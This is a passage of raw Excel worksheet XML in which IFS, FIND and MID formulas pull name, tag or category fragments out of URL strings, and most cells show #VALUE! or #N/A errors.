        <f t="shared" ref="D203:D266" si="12">IF(FIND("category",$A203,1)&gt;0,MID($A203,FIND("category",$A203,1)+9,LEN($A203)-FIND("category",$A203,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E203" t="e" cm="1">
        <f t="array" ref="E203">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A203)), MID($A203, FIND("name=",$A203) + 5, LEN($A203) - FIND("name=",$A203)),
    ISNUMBER(FIND("tag/",$A203)), MID($A203, FIND("tag/",$A203) + 4, LEN($A203) - FIND("tag/",$A203)),
    ISNUMBER(FIND("category",$A203)), MID($A203, FIND("category",$A203) + 9, LEN($A203) - FIND("category",$A203)))</f>
        <v>#N/A</v>
      </c>
      <c r="F203" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="204" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A204" t="s">
        <v>2264</v>
      </c>
      <c r="B204" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C204" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D204" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E204" t="e" cm="1">
        <f t="array" ref="E204">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A204)), MID($A204, FIND("name=",$A204) + 5, LEN($A204) - FIND("name=",$A204)),
    ISNUMBER(FIND("tag/",$A204)), MID($A204, FIND("tag/",$A204) + 4, LEN($A204) - FIND("tag/",$A204)),
    ISNUMBER(FIND("category",$A204)), MID($A204, FIND("category",$A204) + 9, LEN($A204) - FIND("category",$A204)))</f>
        <v>#N/A</v>
      </c>
      <c r="F204" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="205" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A205" t="s">
        <v>2262</v>
      </c>
      <c r="B205" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C205" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D205" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E205" t="e" cm="1">
        <f t="array" ref="E205">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A205)), MID($A205, FIND("name=",$A205) + 5, LEN($A205) - FIND("name=",$A205)),
    ISNUMBER(FIND("tag/",$A205)), MID($A205, FIND("tag/",$A205) + 4, LEN($A205) - FIND("tag/",$A205)),
    ISNUMBER(FIND("category",$A205)), MID($A205, FIND("category",$A205) + 9, LEN($A205) - FIND("category",$A205)))</f>
        <v>#N/A</v>
      </c>
      <c r="F205" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="206" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A206" t="s">
        <v>2265</v>
      </c>
      <c r="B206" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C206" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D206" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E206" t="e" cm="1">
        <f t="array" ref="E206">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A206)), MID($A206, FIND("name=",$A206) + 5, LEN($A206) - FIND("name=",$A206)),
    ISNUMBER(FIND("tag/",$A206)), MID($A206, FIND("tag/",$A206) + 4, LEN($A206) - FIND("tag/",$A206)),
    ISNUMBER(FIND("category",$A206)), MID($A206, FIND("category",$A206) + 9, LEN($A206) - FIND("category",$A206)))</f>
        <v>#N/A</v>
      </c>
      <c r="F206" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="207" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A207" t="s">
        <v>2248</v>
      </c>
      <c r="B207" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C207" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D207" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E207" t="e" cm="1">
        <f t="array" ref="E207">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A207)), MID($A207, FIND("name=",$A207) + 5, LEN($A207) - FIND("name=",$A207)),
    ISNUMBER(FIND("tag/",$A207)), MID($A207, FIND("tag/",$A207) + 4, LEN($A207) - FIND("tag/",$A207)),
    ISNUMBER(FIND("category",$A207)), MID($A207, FIND("category",$A207) + 9, LEN($A207) - FIND("category",$A207)))</f>
        <v>#N/A</v>
      </c>
      <c r="F207" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="208" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A208" t="s">
        <v>2289</v>
      </c>
      <c r="B208" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C208" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D208" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E208" t="e" cm="1">
        <f t="array" ref="E208">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A208)), MID($A208, FIND("name=",$A208) + 5, LEN($A208) - FIND("name=",$A208)),
    ISNUMBER(FIND("tag/",$A208)), MID($A208, FIND("tag/",$A208) + 4, LEN($A208) - FIND("tag/",$A208)),
    ISNUMBER(FIND("category",$A208)), MID($A208, FIND("category",$A208) + 9, LEN($A208) - FIND("category",$A208)))</f>
        <v>#N/A</v>
      </c>
      <c r="F208" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="209" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A209" t="s">
        <v>2339</v>
      </c>
      <c r="B209" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C209" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D209" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E209" t="e" cm="1">
        <f t="array" ref="E209">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A209)), MID($A209, FIND("name=",$A209) + 5, LEN($A209) - FIND("name=",$A209)),
    ISNUMBER(FIND("tag/",$A209)), MID($A209, FIND("tag/",$A209) + 4, LEN($A209) - FIND("tag/",$A209)),
    ISNUMBER(FIND("category",$A209)), MID($A209, FIND("category",$A209) + 9, LEN($A209) - FIND("category",$A209)))</f>
        <v>#N/A</v>
      </c>
      <c r="F209" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="210" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A210" t="s">
        <v>2340</v>
      </c>
      <c r="B210" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C210" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D210" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E210" t="e" cm="1">
        <f t="array" ref="E210">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A210)), MID($A210, FIND("name=",$A210) + 5, LEN($A210) - FIND("name=",$A210)),
    ISNUMBER(FIND("tag/",$A210)), MID($A210, FIND("tag/",$A210) + 4, LEN($A210) - FIND("tag/",$A210)),
    ISNUMBER(FIND("category",$A210)), MID($A210, FIND("category",$A210) + 9, LEN($A210) - FIND("category",$A210)))</f>
        <v>#N/A</v>
      </c>
      <c r="F210" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="211" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A211" t="s">
        <v>2319</v>
      </c>
      <c r="B211" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C211" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D211" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E211" t="e" cm="1">
        <f t="array" ref="E211">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A211)), MID($A211, FIND("name=",$A211) + 5, LEN($A211) - FIND("name=",$A211)),
    ISNUMBER(FIND("tag/",$A211)), MID($A211, FIND("tag/",$A211) + 4, LEN($A211) - FIND("tag/",$A211)),
    ISNUMBER(FIND("category",$A211)), MID($A211, FIND("category",$A211) + 9, LEN($A211) - FIND("category",$A211)))</f>
        <v>#N/A</v>
      </c>
      <c r="F211" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="212" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A212" t="s">
        <v>2341</v>
      </c>
      <c r="B212" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C212" t="str">
        <f t="shared" si="11"/>
        <v>sucheta-dutta/</v>
      </c>
      <c r="D212" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E212" t="str" cm="1">
        <f t="array" ref="E212">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A212)), MID($A212, FIND("name=",$A212) + 5, LEN($A212) - FIND("name=",$A212)),
    ISNUMBER(FIND("tag/",$A212)), MID($A212, FIND("tag/",$A212) + 4, LEN($A212) - FIND("tag/",$A212)),
    ISNUMBER(FIND("category",$A212)), MID($A212, FIND("category",$A212) + 9, LEN($A212) - FIND("category",$A212)))</f>
        <v>sucheta-dutta/</v>
      </c>
      <c r="F212" t="s">
        <v>3333</v>
      </c>
    </row>
    <row r="213" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A213" t="s">
        <v>2326</v>
      </c>
      <c r="B213" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C213" t="str">
        <f t="shared" si="11"/>
        <v>madhuri-braganza/</v>
      </c>
      <c r="D213" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E213" t="str" cm="1">
        <f t="array" ref="E213">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A213)), MID($A213, FIND("name=",$A213) + 5, LEN($A213) - FIND("name=",$A213)),
    ISNUMBER(FIND("tag/",$A213)), MID($A213, FIND("tag/",$A213) + 4, LEN($A213) - FIND("tag/",$A213)),
    ISNUMBER(FIND("category",$A213)), MID($A213, FIND("category",$A213) + 9, LEN($A213) - FIND("category",$A213)))</f>
        <v>madhuri-braganza/</v>
      </c>
      <c r="F213" t="s">
        <v>3326</v>
      </c>
    </row>
    <row r="214" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A214" t="s">
        <v>2291</v>
      </c>
      <c r="B214" t="str">
        <f t="shared" si="10"/>
        <v>Samyuktha%20Menon</v>
      </c>
      <c r="C214" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D214" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E214" t="str" cm="1">
        <f t="array" ref="E214">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A214)), MID($A214, FIND("name=",$A214) + 5, LEN($A214) - FIND("name=",$A214)),
    ISNUMBER(FIND("tag/",$A214)), MID($A214, FIND("tag/",$A214) + 4, LEN($A214) - FIND("tag/",$A214)),
    ISNUMBER(FIND("category",$A214)), MID($A214, FIND("category",$A214) + 9, LEN($A214) - FIND("category",$A214)))</f>
        <v>Samyuktha%20Menon</v>
      </c>
      <c r="F214" t="s">
        <v>3314</v>
      </c>
    </row>
    <row r="215" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A215" t="s">
        <v>2333</v>
      </c>
      <c r="B215" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C215" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D215" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E215" t="e" cm="1">
        <f t="array" ref="E215">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A215)), MID($A215, FIND("name=",$A215) + 5, LEN($A215) - FIND("name=",$A215)),
    ISNUMBER(FIND("tag/",$A215)), MID($A215, FIND("tag/",$A215) + 4, LEN($A215) - FIND("tag/",$A215)),
    ISNUMBER(FIND("category",$A215)), MID($A215, FIND("category",$A215) + 9, LEN($A215) - FIND("category",$A215)))</f>
        <v>#N/A</v>
      </c>
      <c r="F215" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="216" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A216" t="s">
        <v>2319</v>
      </c>
      <c r="B216" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C216" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D216" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E216" t="e" cm="1">
        <f t="array" ref="E216">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A216)), MID($A216, FIND("name=",$A216) + 5, LEN($A216) - FIND("name=",$A216)),
    ISNUMBER(FIND("tag/",$A216)), MID($A216, FIND("tag/",$A216) + 4, LEN($A216) - FIND("tag/",$A216)),
    ISNUMBER(FIND("category",$A216)), MID($A216, FIND("category",$A216) + 9, LEN($A216) - FIND("category",$A216)))</f>
        <v>#N/A</v>
      </c>
      <c r="F216" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="217" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A217" t="s">
        <v>2268</v>
      </c>
      <c r="B217" t="str">
        <f t="shared" si="10"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C217" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D217" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E217" t="str" cm="1">
        <f t="array" ref="E217">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A217)), MID($A217, FIND("name=",$A217) + 5, LEN($A217) - FIND("name=",$A217)),
    ISNUMBER(FIND("tag/",$A217)), MID($A217, FIND("tag/",$A217) + 4, LEN($A217) - FIND("tag/",$A217)),
    ISNUMBER(FIND("category",$A217)), MID($A217, FIND("category",$A217) + 9, LEN($A217) - FIND("category",$A217)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F217" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="218" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A218" t="s">
        <v>2342</v>
      </c>
      <c r="B218" t="str">
        <f t="shared" si="10"/>
        <v>Shubha%20Poonja</v>
      </c>
      <c r="C218" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D218" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E218" t="str" cm="1">
        <f t="array" ref="E218">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A218)), MID($A218, FIND("name=",$A218) + 5, LEN($A218) - FIND("name=",$A218)),
    ISNUMBER(FIND("tag/",$A218)), MID($A218, FIND("tag/",$A218) + 4, LEN($A218) - FIND("tag/",$A218)),
    ISNUMBER(FIND("category",$A218)), MID($A218, FIND("category",$A218) + 9, LEN($A218) - FIND("category",$A218)))</f>
        <v>Shubha%20Poonja</v>
      </c>
      <c r="F218" t="s">
        <v>3334</v>
      </c>
    </row>
    <row r="219" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A219" t="s">
        <v>2343</v>
      </c>
      <c r="B219" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C219" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D219" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E219" t="e" cm="1">
        <f t="array" ref="E219">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A219)), MID($A219, FIND("name=",$A219) + 5, LEN($A219) - FIND("name=",$A219)),
    ISNUMBER(FIND("tag/",$A219)), MID($A219, FIND("tag/",$A219) + 4, LEN($A219) - FIND("tag/",$A219)),
    ISNUMBER(FIND("category",$A219)), MID($A219, FIND("category",$A219) + 9, LEN($A219) - FIND("category",$A219)))</f>
        <v>#N/A</v>
      </c>
      <c r="F219" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="220" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A220" t="s">
        <v>2283</v>
      </c>
      <c r="B220" t="str">
        <f t="shared" si="10"/>
        <v>Eva%20Lovia</v>
      </c>
      <c r="C220" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D220" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E220" t="str" cm="1">
        <f t="array" ref="E220">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A220)), MID($A220, FIND("name=",$A220) + 5, LEN($A220) - FIND("name=",$A220)),
    ISNUMBER(FIND("tag/",$A220)), MID($A220, FIND("tag/",$A220) + 4, LEN($A220) - FIND("tag/",$A220)),
    ISNUMBER(FIND("category",$A220)), MID($A220, FIND("category",$A220) + 9, LEN($A220) - FIND("category",$A220)))</f>
        <v>Eva%20Lovia</v>
      </c>
      <c r="F220" t="s">
        <v>3311</v>
      </c>
    </row>
    <row r="221" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A221" t="s">
        <v>2283</v>
      </c>
      <c r="B221" t="str">
        <f t="shared" si="10"/>
        <v>Eva%20Lovia</v>
      </c>
      <c r="C221" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D221" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E221" t="str" cm="1">
        <f t="array" ref="E221">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A221)), MID($A221, FIND("name=",$A221) + 5, LEN($A221) - FIND("name=",$A221)),
    ISNUMBER(FIND("tag/",$A221)), MID($A221, FIND("tag/",$A221) + 4, LEN($A221) - FIND("tag/",$A221)),
    ISNUMBER(FIND("category",$A221)), MID($A221, FIND("category",$A221) + 9, LEN($A221) - FIND("category",$A221)))</f>
        <v>Eva%20Lovia</v>
      </c>
      <c r="F221" t="s">
        <v>3311</v>
      </c>
    </row>
    <row r="222" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A222" t="s">
        <v>2268</v>
      </c>
      <c r="B222" t="str">
        <f t="shared" si="10"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C222" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D222" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E222" t="str" cm="1">
        <f t="array" ref="E222">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A222)), MID($A222, FIND("name=",$A222) + 5, LEN($A222) - FIND("name=",$A222)),
    ISNUMBER(FIND("tag/",$A222)), MID($A222, FIND("tag/",$A222) + 4, LEN($A222) - FIND("tag/",$A222)),
    ISNUMBER(FIND("category",$A222)), MID($A222, FIND("category",$A222) + 9, LEN($A222) - FIND("category",$A222)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F222" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="223" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A223" t="s">
        <v>2268</v>
      </c>
      <c r="B223" t="str">
        <f t="shared" si="10"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C223" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D223" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E223" t="str" cm="1">
        <f t="array" ref="E223">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A223)), MID($A223, FIND("name=",$A223) + 5, LEN($A223) - FIND("name=",$A223)),
    ISNUMBER(FIND("tag/",$A223)), MID($A223, FIND("tag/",$A223) + 4, LEN($A223) - FIND("tag/",$A223)),
    ISNUMBER(FIND("category",$A223)), MID($A223, FIND("category",$A223) + 9, LEN($A223) - FIND("category",$A223)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F223" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="224" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A224" t="s">
        <v>2268</v>
      </c>
      <c r="B224" t="str">
        <f t="shared" si="10"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C224" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D224" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E224" t="str" cm="1">
        <f t="array" ref="E224">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A224)), MID($A224, FIND("name=",$A224) + 5, LEN($A224) - FIND("name=",$A224)),
    ISNUMBER(FIND("tag/",$A224)), MID($A224, FIND("tag/",$A224) + 4, LEN($A224) - FIND("tag/",$A224)),
    ISNUMBER(FIND("category",$A224)), MID($A224, FIND("category",$A224) + 9, LEN($A224) - FIND("category",$A224)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F224" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="225" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A225" t="s">
        <v>2268</v>
      </c>
      <c r="B225" t="str">
        <f t="shared" si="10"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C225" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D225" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E225" t="str" cm="1">
        <f t="array" ref="E225">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A225)), MID($A225, FIND("name=",$A225) + 5, LEN($A225) - FIND("name=",$A225)),
    ISNUMBER(FIND("tag/",$A225)), MID($A225, FIND("tag/",$A225) + 4, LEN($A225) - FIND("tag/",$A225)),
    ISNUMBER(FIND("category",$A225)), MID($A225, FIND("category",$A225) + 9, LEN($A225) - FIND("category",$A225)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F225" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="226" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A226" t="s">
        <v>2268</v>
      </c>
      <c r="B226" t="str">
        <f t="shared" si="10"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C226" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D226" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E226" t="str" cm="1">
        <f t="array" ref="E226">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A226)), MID($A226, FIND("name=",$A226) + 5, LEN($A226) - FIND("name=",$A226)),
    ISNUMBER(FIND("tag/",$A226)), MID($A226, FIND("tag/",$A226) + 4, LEN($A226) - FIND("tag/",$A226)),
    ISNUMBER(FIND("category",$A226)), MID($A226, FIND("category",$A226) + 9, LEN($A226) - FIND("category",$A226)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F226" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="227" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A227" t="s">
        <v>2268</v>
      </c>
      <c r="B227" t="str">
        <f t="shared" si="10"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C227" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D227" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E227" t="str" cm="1">
        <f t="array" ref="E227">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A227)), MID($A227, FIND("name=",$A227) + 5, LEN($A227) - FIND("name=",$A227)),
    ISNUMBER(FIND("tag/",$A227)), MID($A227, FIND("tag/",$A227) + 4, LEN($A227) - FIND("tag/",$A227)),
    ISNUMBER(FIND("category",$A227)), MID($A227, FIND("category",$A227) + 9, LEN($A227) - FIND("category",$A227)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F227" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="228" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A228" t="s">
        <v>2268</v>
      </c>
      <c r="B228" t="str">
        <f t="shared" si="10"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C228" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D228" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E228" t="str" cm="1">
        <f t="array" ref="E228">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A228)), MID($A228, FIND("name=",$A228) + 5, LEN($A228) - FIND("name=",$A228)),
    ISNUMBER(FIND("tag/",$A228)), MID($A228, FIND("tag/",$A228) + 4, LEN($A228) - FIND("tag/",$A228)),
    ISNUMBER(FIND("category",$A228)), MID($A228, FIND("category",$A228) + 9, LEN($A228) - FIND("category",$A228)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F228" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="229" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A229" t="s">
        <v>2268</v>
      </c>
      <c r="B229" t="str">
        <f t="shared" si="10"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C229" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D229" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E229" t="str" cm="1">
        <f t="array" ref="E229">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A229)), MID($A229, FIND("name=",$A229) + 5, LEN($A229) - FIND("name=",$A229)),
    ISNUMBER(FIND("tag/",$A229)), MID($A229, FIND("tag/",$A229) + 4, LEN($A229) - FIND("tag/",$A229)),
    ISNUMBER(FIND("category",$A229)), MID($A229, FIND("category",$A229) + 9, LEN($A229) - FIND("category",$A229)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F229" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="230" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A230" t="s">
        <v>2268</v>
      </c>
      <c r="B230" t="str">
        <f t="shared" si="10"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C230" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D230" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E230" t="str" cm="1">
        <f t="array" ref="E230">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A230)), MID($A230, FIND("name=",$A230) + 5, LEN($A230) - FIND("name=",$A230)),
    ISNUMBER(FIND("tag/",$A230)), MID($A230, FIND("tag/",$A230) + 4, LEN($A230) - FIND("tag/",$A230)),
    ISNUMBER(FIND("category",$A230)), MID($A230, FIND("category",$A230) + 9, LEN($A230) - FIND("category",$A230)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F230" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="231" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A231" t="s">
        <v>2289</v>
      </c>
      <c r="B231" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C231" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D231" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E231" t="e" cm="1">
        <f t="array" ref="E231">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A231)), MID($A231, FIND("name=",$A231) + 5, LEN($A231) - FIND("name=",$A231)),
    ISNUMBER(FIND("tag/",$A231)), MID($A231, FIND("tag/",$A231) + 4, LEN($A231) - FIND("tag/",$A231)),
    ISNUMBER(FIND("category",$A231)), MID($A231, FIND("category",$A231) + 9, LEN($A231) - FIND("category",$A231)))</f>
        <v>#N/A</v>
      </c>
      <c r="F231" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="232" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A232" t="s">
        <v>2319</v>
      </c>
      <c r="B232" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C232" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D232" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E232" t="e" cm="1">
        <f t="array" ref="E232">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A232)), MID($A232, FIND("name=",$A232) + 5, LEN($A232) - FIND("name=",$A232)),
    ISNUMBER(FIND("tag/",$A232)), MID($A232, FIND("tag/",$A232) + 4, LEN($A232) - FIND("tag/",$A232)),
    ISNUMBER(FIND("category",$A232)), MID($A232, FIND("category",$A232) + 9, LEN($A232) - FIND("category",$A232)))</f>
        <v>#N/A</v>
      </c>
      <c r="F232" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="233" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A233" t="s">
        <v>2319</v>
      </c>
      <c r="B233" t="e">
        <f t="shared" si="10"/>
        <v>#VALUE!</v>
      </c>
      <c r="C233" t="e">
        <f t="shared" si="11"/>
        <v>#VALUE!</v>
      </c>
      <c r="D233" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E233" t="e" cm="1">
